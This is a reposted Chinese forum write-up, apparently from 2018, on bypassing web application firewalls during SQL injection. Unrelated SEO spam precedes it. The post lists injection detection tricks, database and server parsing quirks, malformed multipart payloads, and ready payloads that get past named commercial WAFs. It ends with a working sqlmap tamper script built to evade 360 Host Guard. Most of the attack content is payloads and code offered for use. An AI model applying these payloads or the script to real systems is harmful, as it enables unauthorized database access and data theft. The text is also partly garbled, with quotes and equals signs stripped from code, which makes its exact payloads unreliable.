做电商网站价格,哪个公司做网站好苏州,网上超市商城,大连app开发定制本帖最后由 xmidf 于 2018-7-11 10:16 编辑作者#xff1a;whynot 转自#xff1a;先知0x0 前言这里是简单对sql注入绕过waf的一个小总结#xff0c;非安全研究员#xff0c;这里不讲原理#xff0c;关于原理搜集了一些其他大佬的文章(文章在最下面请自取)#xff0…本帖最后由 xmidf 于 2018-7-11 10:16 编辑作者whynot 转自先知0x0 前言这里是简单对sql注入绕过waf的一个小总结非安全研究员这里不讲原理关于原理搜集了一些其他大佬的文章(文章在最下面请自取)感谢他们的分享比着葫芦画瓢对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测一般的注入还是很好判断的特别是基于报错但有的时候略微有些奇葩的环境再加上一些乱七八糟 waf就比较难搞了这里简单总结了一些方法。利用数据库独有的一些函数access asc chr len #access-functionsmysql substring substr lengthmssql char ascii len substring #mssql function stroracle ascii chr length substr upper lower replace(x,old,new)这些数据库中一个通用的函数就是abs如果觉得是int型注入不妨先试试2-abs(1),然后结合各类数据库的一些函数来判断是什么数据库的注入,当然对数据库了解越多越好。改变请求方式根据经验一般情况下各脚本对http request method如下这里以GET为例子针对www.vul.com/?id1来进行判断。php GETaspx GETasp GET POST COOKIEjsp GET POST平常渗透测试中总是遇到各种各样的waf有的时候一个单引号就死了这个时候首选的一些方法就是转换请求头了毕竟GET不如POSTPOST不如multipart/form-data当然不要看到php就不去转换任何情况下都要尝试一下。当然可以用burp很方便的来进行change request method以及change body encoding。之前碰到过一个有趣的例子asp的站点可以通过cookie提交数据而且可以使用len函数可以初步判断为access或者mssql数据库但是还是很头疼最后一位大哥使用下面的函数可以判断成功。www.vul.com/2.asp?id482483-chr(chr(52)chr(57)) #482chr(52) ‘4’chr(57) ‘9’chr(49) ‘1’ #chr(52)chr(57)为49 chr(49)为1 虽然最后也没什么卵用但还是挺有意思的数据库特性mysql 注释符号# – ;%00 // 字符串可以使用成对的引号’admin’ admin’’’mssql 注释符号– // ;%00oracle 注释符号– /**/ adminadm’||’in空白符号MySQL5 09 0A 0B 0C 0D A0 20Oracle 00 0A 0D 0C 09 20MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20mysql和mssql可以使用|来进行相关的运算而oracle会把||当成连接字符。[AppleScript] 纯文本查看 复制代码1. iisasp(x)1.%u特性: iis支持对unicode的解析如:payload为[s%u006c%u0006ect],解析出来后则是[select]%u0061nd 11另类%u特性: unicode在iis解析之后会被转换成multibyte但是转换的过程中可能出现:多个widechar可能会转换为同一个字符。如select中的e对应的unicode为%u0065但是%u00f0同样会被转换成为e s%u00f0lectiisasp2.%特性: union selec%t user fr%om dd #iisasp aspiis环境下会忽略掉百分号如payload为[sele%ct], 解析出来后则是[select]3.asp/asp.net在解析请求的时候允许Content-Type: application/x-www-form-urlencoded的数据提交方式select%201%20from%20userasp/asp.net request解析:4.在asp和asp.net中获取用户的提交的参数一般使用request包当使用request(‘id’)的形式获取包的时候会出现GETPOST分不清的情况譬如可以构造一个请求包METHOD为GET但是包中还带有POST的内容和POST的content-type, 换一种理解方式也就是将原本的post数据包的method改成GET,如果使用request(‘id’)方式获取数据仍会获取到post的内容2. phpapache畸形的boundary1.php在解析multipart data的时候有自己的特性对于boundary的识别只取了逗号前面的内容例如我们设置的boundary为—-aaaa,123456php解析的时候只识别了—-aaaa,后面的内容均没有识别。然而其他的如WAF在做解析的时候有可能获取的是整个字符串此时可能就会出现BYPASSContent-Type: multipart/form-data; boundary------,xxxxContent-Length: 191------,xxxxContent-Disposition: form-data; nameimg; filenameimg.gifGIF89a------Content-Disposition: form-data; nameid1 union select null,null,flag,null from flag limit 1 offset 1-- ---------------,xxxx--2.畸形method(header头中)某些apache版本在做GET请求的时候无论method为何值均会取出GET的内容。如请求的method名为DOTA依然会返回GET方法的值即,可以任意替换GET方法为其它值但仍能有效工作但如果waf严格按照GET方法取值则取不到任何内容3. web应用层1.双重URL编码: 即web应用层在接受到经过服务器层解码后的参数后又进行了一次URL解码2.变换请求方式在web应用中使用了统一获取参数的方式: 如php里使用$_REQUEST获取参数但WAF层如果过滤不全则容易bypass如waf层过滤了get/post但没有过滤cookie而web应用层并不关心参数是否来自cookieurlencode和form-data: POST在提交数据的时候有两种方式第一种方式是使用urlencode的方式提交第二种方式是使用form-data的方式提交。当我们在测试的时候如果发现POST提交的数据被过滤掉了此时可以考虑使用form-data的方式去提交4. hppasp.net iisid1,2,3 #?stra%27/*str*/and/*str*/version0--asp iis id1,2,3php apache id3jsp tomcat id1这里提供一种针对普通检测的方法大家可自行发挥。mysql int型 %20%26%2011 mysql.php?id1%20%26%2011w1.png (1.24 MB, 下载次数: 74)2018-7-11 17:53 上传另外在字符型中 ‘and’1’’1是不需要加空格的有时候也可以绕过一些waf判断w2.png (1.03 MB, 下载次数: 86)2018-7-11 17:54 上传0x2 bypasswaf由于mysql的灵活性这里以mysql绕过为主针对各大主流waf厂商进行一个测试主要测试在线版的本地就安装了一个360主机卫士。其中http://192.168.44.132/mysql.php?id1是我本地的一个测试环境其中下面的绕过都是以fuzz为主不考虑web容器的特性尝试绕过联合查询 -1 union select 123 from dual百度云加速bypass union select #filterfrom dual #not filtedselect from dual #filter只需要绕过select即可 使用--aaaaaa%0a可bypassw3.png (647.51 KB, 下载次数: 84)2018-7-11 17:55 上传360主机卫士bypass 发现%23%0aand%230a11 可以绕过and 11 限制最后在union select from的时候却绕不过去直接使用大字符串来fuzz %23-FUZZ-%0a https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt 发现可以成功绕过wafw4.png (192.78 KB, 下载次数: 86)2018-7-11 17:57 上传云锁 union select 如下就可以绕过http://www.yunsuo.com.cn/download.html?id1%20union/*!/*!select%201,2,3*/转换成multiform/data可轻松绕过w5.png (130.86 KB, 下载次数: 90)2018-7-11 17:58 上传安全狗bypass 直接搞就行了w6.png (898.17 KB, 下载次数: 91)2018-7-11 17:58 上传当然也可以chunked提交w7.png (2.02 MB, 下载次数: 99)2018-7-11 17:59 上传阿里云尝试使用自定义变量方式来绕过 a:(select b:table_namefrom{a information_schema.TABLES }limit 0,1)union select 1,ap:(select)被过滤 fuzz下p参数使用$:(select)可以绕过union select 1被过滤 使用union%23aa%0a/!select--%01%0a/1,$,3 可以绕过发现重点就是绕过表名 select 1 from dual 一些常规的方法测试无果 随便fuzz下注释/!数字/却偶然发现有俩个数据包遗漏想起了以前乌云上一哥的的一个漏洞https://wooyun.shuimugan.com/bug/view?bug_no94367w8.png (192.62 KB, 下载次数: 93)2018-7-11 18:00 上传难道是因为访问频率导致遗漏随即我又进行了一些fuzz fuzz1w到5w数字型的注释 加大线程 发现遗漏了更多w9.png (201.65 KB, 下载次数: 79)2018-7-11 18:00 上传我想测试一下之前的waf挑战赛发现之前提交的payload已经修复了而且那个漏洞url无法访问了 所以无法确认。随即我又进行了一些超长字符串的fuzz 简单fuzz1w-10w 以500为step 发现现象更多了 可初步判断存在遗漏w10.png (216.08 KB, 下载次数: 108)2018-7-11 18:01 上传### 0x3 自动化以360主机卫士为例编写sqlmap tamper脚本。正常无waf sqlmap联合查询如下w11.png (237.26 KB, 下载次数: 98)2018-7-11 18:01 上传开启主机卫士放到浏览器调试修改相关payload使其能正常运行。最后tamper脚本如下[AppleScript] 纯文本查看 复制代码from lib.core.enums import PRIORITYfrom lib.core.settings import UNICODE_ENCODING__priority__ PRIORITY.LOWdef dependencies():passdef tamper(payload, **kwargs):Replaces keywords tamper(UNION SELECT id FROM users)1 union%23!%23$%%5e%26%2a()%60~%0a/*!12345select*/ NULL,/*!12345CONCAT*/(0x7170706271,IFNULL(/*!12345CASt(*/COUNT(*) AS CHAR),0x20),0x7171786b71),NULL/*!%23!%23$%%5e%26%2a()%60~%0afrOm*/INFORMATION_SCHEMA.COLUMNS WHERE table_name0x61646d696e AND table_schema0x73716c696e6a656374--if payload:payloadpayload.replace(UNION ALL SELECT,union%23!%23$%%5e%26%2a()%60~%0a/*!12345select*/)payloadpayload.replace(UNION SELECT,union%23!%23$%%5e%26%2a()%60~%0a/*!12345select*/)payloadpayload.replace( FROM ,/*!%23!%23$%%5e%26%2a()%60~%0afrOm*/)payloadpayload.replace(CONCAT,/*!12345CONCAT*/)payloadpayload.replace(CAST(,/*!12345CAST(*/)payloadpayload.replace(CASE,/*!12345CASE*/)payloadpayload.replace(DATABASE(),database/**/())return payload可以成功获取到相关数据。w12.png (448.23 KB, 下载次数: 94)2018-7-11 18:02 上传其他参考链接如下[AppleScript] 纯文本查看 复制代码http://www.anquan.us/search?keywordsbypasscontent_search_byby_bugs[url]http://drops.xmd5.com/static/drops/tips-7883.html[/url][url]https://xianzhi.aliyun.com/forum/attachment/big_size/wafbypass_sql.pdf[/url][url]http://drops.xmd5.com/static/drops/papers-4323.html[/url][url]https://www.cnblogs.com/xiaozi/p/6927348.html[/url][url]http://swende.se/blog/HTTPChunked.html#[/url][url]https://xz.aliyun.com/t/1239[/url][url]http://www.sqlinjectionwiki.com/categories/2/mysql-sql-injection-cheat-sheet/[/url][url]https://mp.weixin.qq.com/s/S318-e4-eskfRG38HZk_Qw[/url][url]https://joychou.org/web/nginx-Lua-waf-general-bypass-method.html[/url] #nginx lua waf[url]https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF[/url][url]https://websec.ca/kb/sql_injection#MySQL_Comment_Out_Query[/url][url]https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423[/url]
